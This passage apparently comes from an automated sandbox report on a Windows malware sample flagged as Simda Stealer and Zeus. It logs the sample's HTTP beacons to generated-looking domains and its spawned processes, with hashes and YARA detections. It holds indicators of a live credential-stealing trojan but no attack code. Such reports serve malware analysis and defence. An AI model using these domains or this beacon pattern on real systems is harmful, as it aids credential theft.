3 | 192.168.2.10 | 64056 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:11 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:25:14 UTC | 1102 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:14 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="82.7",amp_style_sanitizer;dur="29.9",amp_tag_and_attribute_sanitizer;dur="39.8",amp_optimizer;dur="38.4"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnVbsvyJbXv35%2Fq2Vgc0nWpbkPaESsc7YhFuHeJTJK7z%2B8ulvwqV50phI%2BFyfyvkKL%2F%2BDJUV9cEEM3jYk%2BqCJIwq9xAm%2FxoECMpWOV6SDs2%2FHVfTCSsgD2V%2BPXW%2Fkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffaea3a396a50-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=1641723&cwnd=251&unsent_bytes=0&cid=e91537255902d88c&ts=3073&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 64058 | 188.114.97.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:15 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:25:16 UTC | 1094 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:16 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="29.9",amp_style_sanitizer;dur="11.5",amp_tag_and_attribute_sanitizer;dur="14.2",amp_optimizer;dur="20.5"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GekztQz1A10OtUkahkdaGerJujXD1US1a88cVxhgD7dcdOoNjvD8%2FpY%2By%2FH6sfcDiDRn7zjM2sna4%2BQPnDaanJYj5dHHP7KWWr8v%2B7pBY60E%2FWMA4Jf85GYhZmKnrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb02ee5c43fe-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2220858&cwnd=244&unsent_bytes=0&cid=d104671925f2b1d9&ts=1703&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 62049 | 99.83.170.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:30 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Connection: Keep-Alive
2024-11-11 17:25:31 UTC | 352 | IN | HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 11 Nov 2024 17:25:31 GMT
Etag: "8i725f1blz19wv"
Server: Caddy
Server: awselb/2.0
Vary: Accept-Encoding
X-Powered-By: Next.js
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 62050 | 188.114.96.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:31 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:25:31 UTC | 945 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tWGvUWrHSqfbbgsWEl%2BGkY0QEjgyi7VA5B4jGXL3Ppw4ZV7Fivf0bRuvu4UtiRYRYIppUy79ePPjSaQEzGJ%2F0vj%2Bp0bNuTkEWjZQnBfmIAH74XFr2pnXk1MV6zwhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb65b9af5391-DEN
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=46905&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=61831&cwnd=32&unsent_bytes=0&cid=8340e877fedd24c3&ts=709&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 62051 | 188.114.96.3 | 443 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:32 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:25:33 UTC | 956 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:33 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk3mjjcLLNogo8n%2FO1NZ%2FzJH5m4jAys249E2LCauldADu%2FvW%2FcQTr%2BHNWp2PXJMY0JniZZsWuAK8mXNLH1Cv%2BK5gUiz5USEVlS5aBVev%2FgLNrC1PE4iDxizaupLXug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffb704e748c57-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=5ce8563c57c430c1&ts=1019&x=0"



                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:12:24:23
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Z8eHwAvqAh.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Z8eHwAvqAh.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:3AB620205ABE34E0BB0A34C253B30CD7
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:12:24:25
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:3544C1362497D11F8724B63036038086
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:12:25:40
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                            Start time:12:25:40
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

Target ID:13
Start time:12:25:40
Start date:11/11/2024
Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
Imagebase:0x560000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:16
Start time:12:25:41
Start date:11/11/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
Imagebase:0xb30000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:12:25:41
Start date:11/11/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 732
Imagebase:0xb30000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:18
Start time:12:25:41
Start date:11/11/2024
Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
Imagebase:0x560000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:20
Start time:12:25:41
Start date:11/11/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 740
Imagebase:0xb30000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:22
Start time:12:25:43
Start date:11/11/2024
Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
Imagebase:0x560000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:24
Start time:12:25:43
Start date:11/11/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 740
Imagebase:0xb30000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:25
Start time:12:25:43
Start date:11/11/2024
Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
Imagebase:0x560000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:27
Start time:12:25:44
Start date:11/11/2024
Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
Imagebase:0x560000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:true

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:12:25:45
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:12:25:45
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:12:25:46
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:12:25:46
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:12:25:46
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe"
                                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:12:25:47
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
